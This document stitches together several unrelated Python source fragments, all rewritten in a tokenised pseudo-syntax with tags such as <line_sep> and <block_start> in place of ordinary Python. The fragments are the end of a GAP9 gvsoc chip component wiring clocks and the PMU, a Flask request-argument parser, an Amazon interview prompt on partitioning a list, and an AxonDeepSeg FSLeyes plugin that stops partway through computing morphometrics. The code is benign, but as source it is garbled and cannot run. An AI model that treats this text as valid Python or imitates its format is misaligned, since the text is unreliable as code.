<for_stmt>cid range(0 nb_cluster)<block_start>cluster=clusters[cid]<line_sep>self.bind(ref_clock_generator 'clock_sync' cluster 'ref_clock')<line_sep>self.bind(cluster 'dma_irq' soc 'dma_irq')<for_stmt>pe range(0 clusters[0].get_property('nb_pe' int))<block_start>self.bind(soc 'halt_cluster%d_pe%d'%(cid pe) cluster 'halt_pe%d'%pe)<block_end>self.bind(cluster_clocks[cid] 'out' clusters[cid] 'clock')<line_sep>self.bind(soc get_cluster_name(cid)+'_fll' cluster_clocks[cid] 'clock_in')<line_sep>self.bind(soc get_cluster_name(cid)+'_input' clusters[cid] 'input')<line_sep>self.bind(clusters[cid] 'soc' soc 'soc_input')<block_end># Soc
self.bind(soc 'fast_clk_ctrl' fast_clock_generator 'power')<line_sep>self.bind(soc 'ref_clk_ctrl' ref_clock_generator 'power')<line_sep>self.bind(soc 'fll_soc_clock' soc_clock 'clock_in')<line_sep># Fast clock
self.bind(fast_clock 'out' fast_clock_generator 'clock')<line_sep>self.bind(fast_clock_generator 'clock_sync' soc 'fast_clock')<line_sep>self.bind(fast_clock_generator 'clock_ctrl' fast_clock 'clock_in')<line_sep># Ref clock
self.bind(ref_clock 'out' ref_clock_generator 'clock')<line_sep># RTC
self.bind(rtc 'apb_irq' soc 'rtc_apb_irq')<line_sep>self.bind(rtc 'irq' soc 'wakeup_rtc')<line_sep>self.bind(rtc 'event' soc 'rtc_event_in')<line_sep>self.bind(soc 'rtc_input' rtc 'input')<line_sep>self.bind(soc_clock 'out' rtc 'clock')<line_sep>self.bind(ref_clock_generator 'clock_sync' rtc 'ref_clock')<line_sep># PMU
self.bind(soc_clock 'out' pmu 'clock')<line_sep>self.bind(soc 'pmu_input' pmu 'input')<line_sep>self.bind(pmu 'icu6_reset' clusters[0] 'reset')<line_sep>self.bind(pmu 'icu5_reset' soc 'reset')<line_sep>self.bind(ref_clock 'out' pmu 'ref_clock')<line_sep>self.bind(pmu 'event' soc 'event')<line_sep>self.bind(pmu 'scu_ok' soc 'scu_ok')<line_sep>self.bind(pmu 'picl_ok' soc 'picl_ok')<line_sep>self.bind(soc 'wakeup_out' pmu 'wakeup')<line_sep>self.bind(soc 'wakeup_seq' pmu 'wakeup_seq')<line_sep># SOC
self.bind(self 'bootsel' soc 'bootsel')<line_sep>self.bind(fast_clock 'out' soc 'fast_clock_out')<block_end><def_stmt>gen_gtkw_conf self tree traces<block_start><if_stmt>tree.get_view()<eq>'overview'<block_start>self.vcd_group(self skip=<true>)<block_end><else_stmt><block_start>self.vcd_group(self skip=<false>)<block_end><block_end><block_end>
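# Illustrative note (not from the original source): this component is normally
# instantiated by a gvsoc/gsystree target description, roughly as
#   chip = Gap9(parent, 'chip')
# where `parent` is the enclosing target component; the constructor then builds
# and wires the SoC, cluster(s), clock domains, PMU and RTC declared above.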
|
# Copyright (c) 2020 the original author or authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
<import_from_stmt>flask Request<import_from_stmt>src.exceptions InvalidRequestArgumentValueError<line_sep>UNDEFINED='__UNDEFINED__'<def_stmt>parse_request_bool_arg name:str default:bool request:Request<arrow>bool<block_start>param_value=request.args.get(name.lower() UNDEFINED).upper()<if_stmt>param_value<eq>UNDEFINED<block_start><return>default<block_end><if_stmt>param_value<in>('TRUE' '1')<block_start><return><true><block_end><elif_stmt>param_value<in>('FALSE' '0')<block_start><return><false><block_end><else_stmt><block_start><raise>InvalidRequestArgumentValueError(f"'{name}' parameter accepts only 'true' (or '1') and 'false' (or '0')")<block_end><block_end><def_stmt>parse_request_string_arg name:str default allowed_values request:Request<arrow>str<block_start>name=name.lower()<line_sep>param_value=request.args.get(name.lower() UNDEFINED).upper()<if_stmt>param_value<eq>UNDEFINED<block_start><return>default<block_end>allowed_values=list(allowed_values)<if_stmt>param_value<not><in>allowed_values<block_start><raise>InvalidRequestArgumentValueError(f"'{name}' parameter accepts only '{', '.join(allowed_values)}' values")<block_end><return>param_value<block_end>
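# Illustrative usage sketch (argument names and allowed values are hypothetical;
# `request` is the flask.Request of the current call):
#   detect = parse_request_bool_arg(name='detect_faces', default=True, request=request)
#   mode = parse_request_string_arg(name='mode', default='FAST',
#                                   allowed_values=('FAST', 'ACCURATE'), request=request)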
|
"""This problem was asked by Amazon.
Given a pivot x, and a list lst, partition the list into three parts.
• The first part contains all elements in lst that are less than x
• The second part contains all elements in lst that are equal to x
• The third part contains all elements in lst that are larger than x
Ordering within a part can be arbitrary.
For example, given x = 10 and lst = [9, 12, 3, 5, 14, 10, 10], one partition may be `[9, 3, 5, 10, 10, 12, 14]`.
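One possible approach (illustrative sketch, not part of the original prompt): build
the three parts in a single pass and concatenate them, since ordering within each
part is arbitrary:
def partition(lst, x):
    less, equal, greater = [], [], []
    for v in lst:
        if v < x:
            less.append(v)
        elif v == x:
            equal.append(v)
        else:
            greater.append(v)
    return less + equal + greater
partition([9, 12, 3, 5, 14, 10, 10], 10) gives [9, 3, 5, 10, 10, 12, 14].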
"""<line_sep>
|
"""
This is an FSLeyes plugin script that integrates AxonDeepSeg tools into FSLeyes.
Author : <NAME>
"""<import_stmt>wx<import_stmt>wx.lib.agw.hyperlink<as>hl<import_stmt>fsleyes.controls.controlpanel<as>ctrlpanel<import_stmt>fsleyes.actions.loadoverlay<as>ovLoad<import_stmt>numpy<as>np<import_stmt>nibabel<as>nib<import_from_stmt>PIL Image ImageDraw ImageOps<import_stmt>scipy.misc<import_stmt>json<import_from_stmt>pathlib Path<import_stmt>AxonDeepSeg<import_from_stmt>AxonDeepSeg.apply_model axon_segmentation<import_from_stmt>AxonDeepSeg.segment segment_image<import_stmt>AxonDeepSeg.morphometrics.compute_morphometrics<as>compute_morphs<import_from_stmt>AxonDeepSeg postprocessing params ads_utils<import_from_stmt>config axonmyelin_suffix axon_suffix myelin_suffix index_suffix axonmyelin_index_suffix<import_stmt>math<import_from_stmt>scipy ndimage<as>ndi<import_from_stmt>skimage measure morphology feature<import_stmt>tempfile<import_stmt>openpyxl<import_stmt>pandas<as>pd<import_stmt>imageio<line_sep>VERSION="0.2.19"<class_stmt>ADSsettings<block_start>"""
This class handles everything related to the parameters used in the ADS plugin, including the frame for the settings
menu.
"""<def_stmt>__init__ self ads_control<block_start>"""
Constructor for the ADSsettings class. Initializes the default settings.
:param ads_control: An instance of ADScontrol
:type ads_control: ADScontrol
"""<line_sep>self.ads_control=ads_control<line_sep># Declare the settings used
self.overlap_value=25<line_sep>self.model_resolution=0.01# Unused
self.use_custom_resolution=<false># Unused
self.custom_resolution=0.07# Unused
self.zoom_factor=1.0<line_sep>self.axon_shape="circle"<block_end><def_stmt>on_settings_button self event<block_start>"""
This function creates the settings_frame (the settings menu). It is called when the 'settings' button has been
pressed.
"""<line_sep>self.settings_frame=wx.Frame(self.ads_control title="Settings" size=(600 300))<line_sep>frame_sizer_h=wx.BoxSizer(wx.VERTICAL)<line_sep># Add the overlap value to the settings menu
sizer_overlap_value=wx.BoxSizer(wx.HORIZONTAL)<line_sep>overlap_value_tooltip=wx.ToolTip("Represents the number of pixels that overlap two patches of the image when "<concat>"applying the prediction model")<line_sep>sizer_overlap_value.Add(wx.StaticText(self.settings_frame label="Overlap value (pixels): "))<line_sep>self.overlap_value_spinCtrl=wx.SpinCtrl(self.settings_frame min=0 max=100 initial=self.overlap_value)<line_sep>self.overlap_value_spinCtrl.Bind(wx.EVT_SPINCTRL self.on_overlap_value_changed)<line_sep>self.overlap_value_spinCtrl.SetToolTip(overlap_value_tooltip)<line_sep>sizer_overlap_value.Add(self.overlap_value_spinCtrl flag=wx.SHAPED proportion=1)<line_sep>frame_sizer_h.Add(sizer_overlap_value)<line_sep># Add the zoom factor to the settings menu
sizer_zoom_factor=wx.BoxSizer(wx.HORIZONTAL)<line_sep>zoom_factor_tooltip=wx.ToolTip("When applying the model, the pixel size of the image will be "<concat>"multiplied by this number. The zoom factor does not affect the computation of morphometrics.")<line_sep>sizer_zoom_factor.Add(wx.StaticText(self.settings_frame label="Zoom factor: "))<line_sep>self.zoom_factor_spinCtrlDouble=wx.SpinCtrlDouble(self.settings_frame initial=self.zoom_factor inc=0.0001)<line_sep>self.zoom_factor_spinCtrlDouble.Bind(wx.EVT_SPINCTRLDOUBLE self.on_zoom_factor_changed)<line_sep>self.zoom_factor_spinCtrlDouble.SetToolTip(zoom_factor_tooltip)<line_sep>sizer_zoom_factor.Add(self.zoom_factor_spinCtrlDouble flag=wx.SHAPED proportion=1)<line_sep>frame_sizer_h.Add(sizer_zoom_factor)<line_sep># Add the axon shape selection
axon_shape_choices=["circle" "ellipse"]<line_sep>sizer_axon_shape=wx.BoxSizer(wx.HORIZONTAL)<line_sep>axon_shape_tooltip=wx.ToolTip('Select what is the shape of the axons that will be considered when computing '<concat>'the morphometrics. "circle" will use the equivalent diameter (diameter of a circle with the same area as the axon). '<concat>'"ellipse" will use minor axis of a fitted ellipse as diameter.')<line_sep>sizer_axon_shape.Add(wx.StaticText(self.settings_frame label="Axon shape: "))<line_sep>self.axon_shape_combobox=wx.ComboBox(self.settings_frame choices=axon_shape_choices size=(100 20) value=self.axon_shape)<line_sep>self.axon_shape_combobox.Bind(wx.EVT_COMBOBOX self.on_axon_shape_combobox_item_selected)<line_sep>self.axon_shape_combobox.SetToolTip(axon_shape_tooltip)<line_sep>sizer_axon_shape.Add(self.axon_shape_combobox flag=wx.SHAPED proportion=1)<line_sep>frame_sizer_h.Add(sizer_axon_shape)<line_sep># Add the done button
sizer_done_button=wx.BoxSizer(wx.HORIZONTAL)<line_sep>done_button=wx.Button(self.settings_frame label="Done")<line_sep>done_button.Bind(wx.EVT_BUTTON self.on_done_button)<line_sep>sizer_done_button.Add(done_button flag=wx.SHAPED proportion=1)<line_sep>frame_sizer_h.Add(sizer_done_button)<line_sep>self.settings_frame.SetSizer(frame_sizer_h)<line_sep>self.settings_frame.Show()<block_end><def_stmt>on_overlap_value_changed self event<block_start>self.overlap_value=self.overlap_value_spinCtrl.GetValue()<block_end><def_stmt>on_zoom_factor_changed self event<block_start>self.zoom_factor=self.zoom_factor_spinCtrlDouble.GetValue()<block_end><def_stmt>on_axon_shape_combobox_item_selected self event<block_start>self.axon_shape=self.axon_shape_combobox.GetStringSelection()<block_end><def_stmt>on_done_button self event# TODO: make sure every setting is saved
<block_start>self.settings_frame.Close()<block_end><block_end><class_stmt>ADScontrol(ctrlpanel.ControlPanel)<block_start>"""
This class is the object corresponding to the AxonDeepSeg control panel.
"""<def_stmt>__init__ self ortho *args **kwargs<block_start>"""
This function initializes the control panel. It generates the widgets and adds them to the panel. It also sets
the initial position of the panel to the left.
:param ortho: This is used to access the ortho ops in order to turn off the X and Y canvas as well as the cursor
"""<line_sep>ctrlpanel.ControlPanel.__init__(self ortho *args **kwargs)<line_sep># Create the settings object
self.settings=ADSsettings(self)<line_sep># Add a sizer to the control panel
# This sizer will contain the buttons
sizer_h=wx.BoxSizer(wx.VERTICAL)<line_sep># Add the logo to the control panel
ADS_logo=self.get_logo()<line_sep>sizer_h.Add(ADS_logo flag=wx.SHAPED proportion=1)<line_sep># Add the citation to the control panel
citation_box=wx.TextCtrl(self value=self.get_citation() size=(100 50) style=wx.TE_MULTILINE)<line_sep>sizer_h.Add(citation_box flag=wx.SHAPED proportion=1)<line_sep># Add a hyperlink to the documentation
hyper=hl.HyperLinkCtrl(self -1 label="Need help? Read the documentation" URL="https://axondeepseg.readthedocs.io/en/latest/")<line_sep>sizer_h.Add(hyper flag=wx.SHAPED proportion=1)<line_sep># Define the color of button labels
button_label_color=(0 0 0)<line_sep># Add the image loading button
load_png_button=wx.Button(self label="Load PNG or TIF file")<line_sep>load_png_button.SetForegroundColour(button_label_color)<line_sep>load_png_button.Bind(wx.EVT_BUTTON self.on_load_png_button)<line_sep>load_png_button.SetToolTip(wx.ToolTip("Loads a .png or .tif file into FSLeyes"))<line_sep>sizer_h.Add(load_png_button flag=wx.SHAPED proportion=1)<line_sep># Add the mask loading button
load_mask_button=wx.Button(self label="Load existing mask")<line_sep>load_mask_button.SetForegroundColour(button_label_color)<line_sep>load_mask_button.Bind(wx.EVT_BUTTON self.on_load_mask_button)<line_sep>load_mask_button.SetToolTip(wx.ToolTip("Loads an existing axonmyelin mask into FSLeyes. "<concat>"The selected image should contain both the axon and myelin masks. "<concat>"The regions on the image should have an intensity of 0 for the background, "<concat>"127 for the myelin and 255 for the axons. "))<line_sep>sizer_h.Add(load_mask_button flag=wx.SHAPED proportion=1)<line_sep># Add the model choice combobox
self.model_combobox=wx.ComboBox(self choices=ads_utils.get_existing_models_list() size=(100 20) value="Select the modality" )<line_sep>self.model_combobox.SetForegroundColour(button_label_color)<line_sep>self.model_combobox.SetToolTip(wx.ToolTip("Select the modality used to acquire the image"))<line_sep>sizer_h.Add(self.model_combobox flag=wx.SHAPED proportion=1)<line_sep># Add the button that applies the prediction model
apply_model_button=wx.Button(self label="Apply ADS prediction model")<line_sep>apply_model_button.SetForegroundColour(button_label_color)<line_sep>apply_model_button.Bind(wx.EVT_BUTTON self.on_apply_model_button)<line_sep>apply_model_button.SetToolTip(wx.ToolTip("Applies the prediction model and displays the masks"))<line_sep>sizer_h.Add(apply_model_button flag=wx.SHAPED proportion=1)<line_sep># The Watershed button's purpose isn't clear. It is unavailable for now.
# # Add the button that runs the watershed algorithm
# run_watershed_button = wx.Button(self, label="Run Watershed")
# run_watershed_button.Bind(wx.EVT_BUTTON, self.on_run_watershed_button)
# run_watershed_button.SetToolTip(
# wx.ToolTip(
# "Uses a watershed algorithm to find the different axon+myelin"
# "objects. This is used to see if where are connections"
# " between two axon+myelin objects."
# )
# )
# sizer_h.Add(run_watershed_button, flag=wx.SHAPED, proportion=1)
# Add the fill axon tool
fill_axons_button=wx.Button(self label="Fill axons")<line_sep>fill_axons_button.SetForegroundColour(button_label_color)<line_sep>fill_axons_button.Bind(wx.EVT_BUTTON self.on_fill_axons_button)<line_sep>fill_axons_button.SetToolTip(wx.ToolTip("Automatically fills the axons inside myelin objects."<concat>" THE MYELIN OBJECTS NEED TO BE CLOSED AND SEPARATED FROM EACH "<concat>"OTHER (THEY MUST NOT TOUCH) FOR THIS TOOL TO WORK CORRECTLY."))<line_sep>sizer_h.Add(fill_axons_button flag=wx.SHAPED proportion=1)<line_sep># Add the save Segmentation button
save_segmentation_button=wx.Button(self label="Save segmentation")<line_sep>save_segmentation_button.SetForegroundColour(button_label_color)<line_sep>save_segmentation_button.Bind(wx.EVT_BUTTON self.on_save_segmentation_button)<line_sep>save_segmentation_button.SetToolTip(wx.ToolTip("Saves the axon and myelin masks in the selected folder"))<line_sep>sizer_h.Add(save_segmentation_button flag=wx.SHAPED proportion=1)<line_sep># Add compute morphometrics button
compute_morphometrics_button=wx.Button(self label="Compute morphometrics")<line_sep>compute_morphometrics_button.SetForegroundColour(button_label_color)<line_sep>compute_morphometrics_button.Bind(wx.EVT_BUTTON self.on_compute_morphometrics_button)<line_sep>compute_morphometrics_button.SetToolTip(wx.ToolTip("Calculates and saves the morphometrics to an excel and csv file. "<concat>"Shows the indexes of the axons at the coordinates specified in the morphometrics file."))<line_sep>sizer_h.Add(compute_morphometrics_button flag=wx.SHAPED proportion=1)<line_sep># Add the settings button
settings_button=wx.Button(self label="Settings")<line_sep>settings_button.SetForegroundColour(button_label_color)<line_sep>settings_button.Bind(wx.EVT_BUTTON self.settings.on_settings_button)<line_sep>sizer_h.Add(settings_button flag=wx.SHAPED proportion=1)<line_sep># Set the sizer of the control panel
self.SetSizer(sizer_h)<line_sep># Initialize the variables that are used to track the active image
self.png_image_name=[]<line_sep>self.image_dir_path=[]<line_sep>self.most_recent_watershed_mask_name=<none><line_sep># Toggle off the X and Y canvas
oopts=ortho.sceneOpts<line_sep>oopts.showXCanvas=<false><line_sep>oopts.showYCanvas=<false><line_sep># Toggle off the cursor
oopts.showCursor=<false><line_sep># Toggle off the radiological orientation
self.displayCtx.radioOrientation=<false><line_sep># Invert the Y display
self.frame.viewPanels[0].frame.viewPanels[0].getZCanvas().opts.invertY=<true><line_sep># Create a temporary directory that will hold the NIfTI files
self.ads_temp_dir_var=tempfile.TemporaryDirectory()#This variable needs to stay loaded to keep the temporary
# directory from being destroyed
self.ads_temp_dir=Path(self.ads_temp_dir_var.name)<line_sep># Check the version
self.verrify_version()<block_end><def_stmt>on_load_png_button self event<block_start>"""
This function is called when the user presses on the Load Png button. It allows the user to select a PNG or TIF
image, convert it into a NIfTI and load it into FSLeyes.
"""<line_sep># Ask the user which file he wants to convert
<with_stmt>wx.FileDialog(self "select Image file" style=wx.FD_OPEN|wx.FD_FILE_MUST_EXIST)<as>file_dialog<block_start><if_stmt>(file_dialog.ShowModal()<eq>wx.ID_CANCEL)# The user cancelled the operation
<block_start><return><block_end>in_file=Path(file_dialog.GetPath())<block_end># Check if the image format is valid
image_extension=in_file.suffix<line_sep>valid_extensions=[".png" ".tif" ".jpg" ".jpeg"]<if_stmt>image_extension<not><in>valid_extensions<block_start>self.show_message("Invalid file extension")<line_sep><return><block_end># Store the directory path and image name for later use in the application of the prediction model
self.image_dir_path.append(in_file.parents[0])<line_sep>self.png_image_name.append(in_file.name)<line_sep># Call the function that convert and loads the png or tif image
self.load_png_image_from_path(in_file)<block_end><def_stmt>on_load_mask_button self event<block_start>"""
This function is called when the user presses on the loadMask button. It allows the user to select an existing
PNG mask, convert it into a NIfTI and load it into FSLeyes.
The mask needs to contain an axon + myelin mask. The Axons should have an intensity > 200. The myelin should
have an intensity between 100 and 200. The data should be in uint8.
"""<line_sep># Ask the user to select the mask image
<with_stmt>wx.FileDialog(self "select mask .png file" style=wx.FD_OPEN|wx.FD_FILE_MUST_EXIST)<as>file_dialog<block_start><if_stmt>(file_dialog.ShowModal()<eq>wx.ID_CANCEL)# The user cancelled the operation
<block_start><return><block_end>in_file=Path(file_dialog.GetPath())<block_end># Check if the image format is valid
image_extension=in_file.suffix<line_sep>valid_extensions=[".png" ".tif" ".jpg" ".jpeg"]<if_stmt>image_extension<not><in>valid_extensions<block_start>self.show_message("Invalid file extension")<line_sep><return><block_end># Get the image data
img_png2D=ads_utils.imread(in_file)<line_sep>image_name=in_file.stem<line_sep># Extract the Axon mask
axon_mask=img_png2D<g>200<line_sep>axon_mask=params.intensity['binary']<times>np.array(axon_mask dtype=np.uint8)<line_sep># Extract the Myelin mask
myelin_mask=(img_png2D<g>100)&(img_png2D<l>200)<line_sep>myelin_mask=params.intensity['binary']<times>np.array(myelin_mask dtype=np.uint8)<line_sep># Load the masks into FSLeyes
axon_outfile=self.ads_temp_dir/(image_name+"-axon.png")<line_sep>ads_utils.imwrite(axon_outfile axon_mask)<line_sep>self.load_png_image_from_path(axon_outfile is_mask=<true> colormap="blue")<line_sep>myelin_outfile=self.ads_temp_dir/(image_name+"-myelin.png")<line_sep>ads_utils.imwrite(myelin_outfile myelin_mask)<line_sep>self.load_png_image_from_path(myelin_outfile is_mask=<true> colormap="red")<block_end><def_stmt>on_apply_model_button self event<block_start>"""
This function is called when the user presses on the ApplyModel button. It is used to apply the prediction model
selected in the combobox. The segmentation masks are then loaded into FSLeyes
"""<line_sep># Declare the default resolution of the model
resolution=0.1<line_sep># Get the image name and directory
image_overlay=self.get_visible_image_overlay()<if_stmt>self.get_visible_image_overlay()<is><none><block_start><return><block_end>n_loaded_images=self.png_image_name.__len__()<line_sep>image_name=<none><line_sep>image_directory=<none><for_stmt>i range(n_loaded_images)<block_start><if_stmt>image_overlay.name<eq>(Path(self.png_image_name[i])).stem<block_start>image_name=self.png_image_name[i]<line_sep>image_directory=self.image_dir_path[i]<block_end><block_end><if_stmt>(image_name<is><none>)<or>(image_directory<is><none>)<block_start>self.show_message("Couldn't find the path to the loaded image. "<concat>"Please use the plugin's image loader to import the image you wish to segment. ")<line_sep><return><block_end>image_path=image_directory/image_name<line_sep>image_name_no_extension=Path(image_name).stem<line_sep># Get the selected model
selected_model=self.model_combobox.GetStringSelection()<if_stmt>selected_model<eq>""<block_start>self.show_message("Please select a model")<line_sep><return><block_end># Get the path of the selected model
<if_stmt>any(selected_model<in>models<for>models ads_utils.get_existing_models_list())<block_start>dir_path=Path(AxonDeepSeg.__file__).parents[0]<line_sep>model_path=dir_path/"models"/selected_model<block_end><else_stmt><block_start>self.show_message("Please select a model")<line_sep><return><block_end># If the TEM model is selected, modify the resolution
<if_stmt>"TEM"<in>selected_model.upper()<block_start>resolution=0.01<block_end># Check if the pixel size txt file exist in the imageDirPath
pixel_size_exists=(image_directory/"pixel_size_in_micrometer.txt").exists()<line_sep># if it doesn't exist, ask the user to input the pixel size
<if_stmt>pixel_size_exists<is><false><block_start><with_stmt>wx.TextEntryDialog(self "Enter the pixel size in micrometer" value="0.07")<as>text_entry<block_start><if_stmt>text_entry.ShowModal()<eq>wx.ID_CANCEL<block_start><return><block_end>pixel_size_str=text_entry.GetValue()<block_end>pixel_size_float=float(pixel_size_str)<block_end><else_stmt># read the pixel size
<block_start>resolution_file=open((image_directory/"pixel_size_in_micrometer.txt").__str__() 'r')<line_sep>pixel_size_float=float(resolution_file.read())<block_end># Load model configs and apply prediction
model_configfile=model_path/"config_network.json"<with_stmt>open(model_configfile.__str__() "r")<as>fd<block_start>config_network=json.loads(fd.read())<block_end>segment_image(image_path model_path self.settings.overlap_value config_network resolution acquired_resolution=pixel_size_float<times>self.settings.zoom_factor verbosity_level=3)<line_sep># The axon_segmentation function creates the segmentation masks and stores them as PNG files in the same folder
# as the original image file.
# Load the axon and myelin masks into FSLeyes
axon_mask_path=image_directory/(image_name_no_extension+str(axon_suffix))<line_sep>myelin_mask_path=image_directory/(image_name_no_extension+str(myelin_suffix))<line_sep>self.load_png_image_from_path(axon_mask_path is_mask=<true> colormap="blue")<line_sep>self.load_png_image_from_path(myelin_mask_path is_mask=<true> colormap="red")<line_sep>self.pixel_size_float=pixel_size_float<line_sep><return>self<block_end><def_stmt>on_save_segmentation_button self event<block_start>"""
This function saves the active myelin and axon masks as PNG images. Three (3) images are generated in a folder
selected by the user: one with the axon mask, one with the myelin mask, and one with both.
"""<line_sep># Find the visible myelin and axon masks
axon_mask_overlay=self.get_corrected_axon_overlay()<if_stmt>axon_mask_overlay<is><none><block_start>axon_mask_overlay=self.get_visible_axon_overlay()<block_end>myelin_mask_overlay=self.get_visible_myelin_overlay()<if_stmt>(axon_mask_overlay<is><none>)<or>(myelin_mask_overlay<is><none>)<block_start><return><block_end># Ask the user where to save the segmentation
<with_stmt>wx.DirDialog(self "select the directory in which the segmentation will be save" defaultPath="" style=wx.DD_DEFAULT_STYLE|wx.DD_DIR_MUST_EXIST )<as>file_dialog<block_start><if_stmt>file_dialog.ShowModal()<eq>wx.ID_CANCEL<block_start><return><block_end><block_end>save_dir=Path(file_dialog.GetPath())<line_sep># store the data of the masks in variables as numpy arrays.
# Note: since PIL uses a different convention for the X and Y coordinates, some array manipulation has to be
# done.
# Note 2 : The image array loaded in FSLeyes is flipped. We need to flip it back
myelin_array=np.array(myelin_mask_overlay[: : 0] copy=<true> dtype=np.uint8)<line_sep>myelin_array=np.flipud(myelin_array)<line_sep>myelin_array=np.rot90(myelin_array k=1 axes=(1 0))<line_sep>axon_array=np.array(axon_mask_overlay[: : 0] copy=<true> dtype=np.uint8)<line_sep>axon_array=np.flipud(axon_array)<line_sep>axon_array=np.rot90(axon_array k=1 axes=(1 0))<line_sep># Make sure the masks have the same size
<if_stmt>myelin_array.shape<ne>axon_array.shape<block_start>self.show_message("invalid visible masks dimensions")<line_sep><return><block_end># Remove the intersection
myelin_array,axon_array,intersection=postprocessing.remove_intersection(myelin_array axon_array priority=1 return_overlap=<true>)<if_stmt>intersection.sum()<g>0<block_start>self.show_message("There is an overlap between the axon mask and the myelin mask. The myelin will have priority.")<block_end># Scale the pixel values of the masks to 255 for image saving
myelin_array=myelin_array<times>params.intensity['binary']<line_sep>axon_array=axon_array<times>params.intensity['binary']<line_sep>image_name=myelin_mask_overlay.name[:-len("_seg-myelin")]<line_sep>myelin_and_axon_array=(myelin_array<floordiv>2+axon_array).astype(np.uint8)<line_sep>ads_utils.imwrite(filename=save_dir/(image_name+str(axonmyelin_suffix)) img=myelin_and_axon_array)<line_sep>ads_utils.imwrite(filename=save_dir/(image_name+str(myelin_suffix)) img=myelin_array)<line_sep>ads_utils.imwrite(filename=save_dir/(image_name+str(axon_suffix)) img=axon_array)<block_end><def_stmt>on_run_watershed_button self event<block_start>"""
This function is called when the user presses the runWatershed button. It creates a watershed mask that is
used to locate the connections between the axon-myelin objects.
The runWatershed button is currently commented out, so this function is unused at the moment.
"""<line_sep># Find the visible myelin and axon masks
axon_mask_overlay=self.get_visible_axon_overlay()<line_sep>myelin_mask_overlay=self.get_visible_myelin_overlay()<if_stmt>(axon_mask_overlay<is><none>)<or>(myelin_mask_overlay<is><none>)<block_start><return><block_end># Extract the data from the overlays
axon_array=axon_mask_overlay[: : 0]<line_sep>myelin_array=myelin_mask_overlay[: : 0]<line_sep># Make sure the masks have the same size
<if_stmt>myelin_array.shape<ne>axon_array.shape<block_start>self.show_message("invalid visible masks dimensions")<line_sep><return><block_end># If a watershed mask already exists, remove it.
<for_stmt>an_overlay self.overlayList<block_start><if_stmt>(self.most_recent_watershed_mask_name<is><not><none>)<and>(an_overlay.name<eq>self.most_recent_watershed_mask_name)<block_start>self.overlayList.remove(an_overlay)<block_end><block_end># Compute the watershed mask
watershed_data=self.get_watershed_segmentation(axon_array myelin_array)<line_sep># Save the watershed mask as a png then load it as an overlay
watershed_image_array=np.rot90(watershed_data k=3 axes=(1 0))<line_sep>watershed_image=Image.fromarray(watershed_image_array)<line_sep>file_name=self.ads_temp_dir.name+"/watershed_mask.png"<line_sep>watershed_image.save(file_name)<line_sep>wantershed_mask_overlay=self.load_png_image_from_path(file_name add_to_overlayList=<false>)<line_sep>wantershed_mask_overlay[: : 0]=watershed_data<line_sep>self.overlayList.append(wantershed_mask_overlay)<line_sep># Apply a "random" colour mapping to the watershed mask
opts=self.displayCtx.getOpts(wantershed_mask_overlay)<line_sep>opts.cmap="random"<line_sep>self.most_recent_watershed_mask_name="watershed_mask"<block_end><def_stmt>on_fill_axons_button self event<block_start>"""
This function is called when the fillAxon button is pressed by the user. It uses a flood fill algorithm to fill
the inside of the myelin objects with the axon mask
"""<line_sep># Find the visible myelin and axon mask
myelin_mask_overlay=self.get_visible_myelin_overlay()<line_sep>axon_mask_overlay=self.get_visible_axon_overlay()<if_stmt>myelin_mask_overlay<is><none><block_start><return><block_end><if_stmt>axon_mask_overlay<is><none><block_start><return><block_end># Extract the data from the overlays
myelin_array=myelin_mask_overlay[: : 0]<line_sep>axon_array=axon_mask_overlay[: : 0]<line_sep># Perform the floodfill operation
axon_extracted_array=postprocessing.floodfill_axons(axon_array myelin_array)<line_sep>axon_corr_array=np.flipud(axon_extracted_array)<line_sep>axon_corr_array=params.intensity['binary']<times>np.rot90(axon_corr_array k=1 axes=(1 0))<line_sep>file_name=self.ads_temp_dir/(myelin_mask_overlay.name[:-len("-myelin")]+"-axon-corr.png")<line_sep>ads_utils.imwrite(filename=file_name img=axon_corr_array)<line_sep>self.load_png_image_from_path(file_name is_mask=<true> colormap="blue")<block_end><def_stmt>on_compute_morphometrics_button self event<block_start>"""
Compute morphometrics and save them to an Excel file.
"""<line_sep># Get pixel size
<try_stmt><block_start>pixel_size=self.pixel_size_float<block_end><except_stmt><block_start><with_stmt>wx.TextEntryDialog(self "Enter the pixel size in micrometer" value="0.07")<as>text_entry<block_start><if_stmt>text_entry.ShowModal()<eq>wx.ID_CANCEL<block_start><return><block_end>pixel_size_str=text_entry.GetValue()<block_end>pixel_size=float(pixel_size_str)<block_end># Find the visible myelin and axon masks
axon_mask_overlay=self.get_corrected_axon_overlay()<if_stmt>axon_mask_overlay<is><none><block_start>axon_mask_overlay=self.get_visible_axon_overlay()<block_end>myelin_mask_overlay=self.get_visible_myelin_overlay()<if_stmt>(axon_mask_overlay<is><none>)<or>(myelin_mask_overlay<is><none>)<block_start><return><block_end># store the data of the masks in variables as numpy arrays.
# Note: since PIL uses a different convention for the X and Y coordinates, some array manipulation has to be
# done.
# Note 2 : The image array loaded in FSLeyes is flipped. We need to flip it back
myelin_array=np.array(myelin_mask_overlay[: : 0]<times>params.intensity['binary'] copy=<true> dtype=np.uint8)<line_sep>myelin_array=np.flipud(myelin_array)<line_sep>myelin_array=np.rot90(myelin_array k=1 axes=(1 0))<line_sep>axon_array=np.array(axon_mask_overlay[: : 0]<times>params.intensity['binary'] copy=<true> dtype=np.uint8)<line_sep>axon_array=np.flipud(axon_array)<line_sep>axon_array=np.rot90(axon_array k=1 axes=(1 0))<line_sep># Make sure the masks have the same size
<if_stmt>myelin_array.shape<ne>axon_array.shape<block_start>self.show_message("invalid visible masks dimensions")<line_sep><return><block_end># Save the arrays as PNG files
pred=(myelin_array<floordiv>2+axon_array).astype(np.uint8)<line_sep>pred_axon=pred<g>200<line_sep>pred_myelin=np.logical_and(pred<ge>50 pred<le>200)<line_sep>x=np.array([] dtype=[('x0' 'f4') ('y0' 'f4') ('gratio' 'f4') ('axon_area' 'f4') ('axon_perimeter' 'f4') ('myelin_area' 'f4') ('axon_diam' 'f4') ('myelin_thickness' 'f4') ('axonmyelin_area' 'f4') ('axonmyelin_perimeter' 'f4') ('solidity' 'f4') ('eccentricity' 'f4') ('orientation' 'f4')])<line_sep># Compute statistics
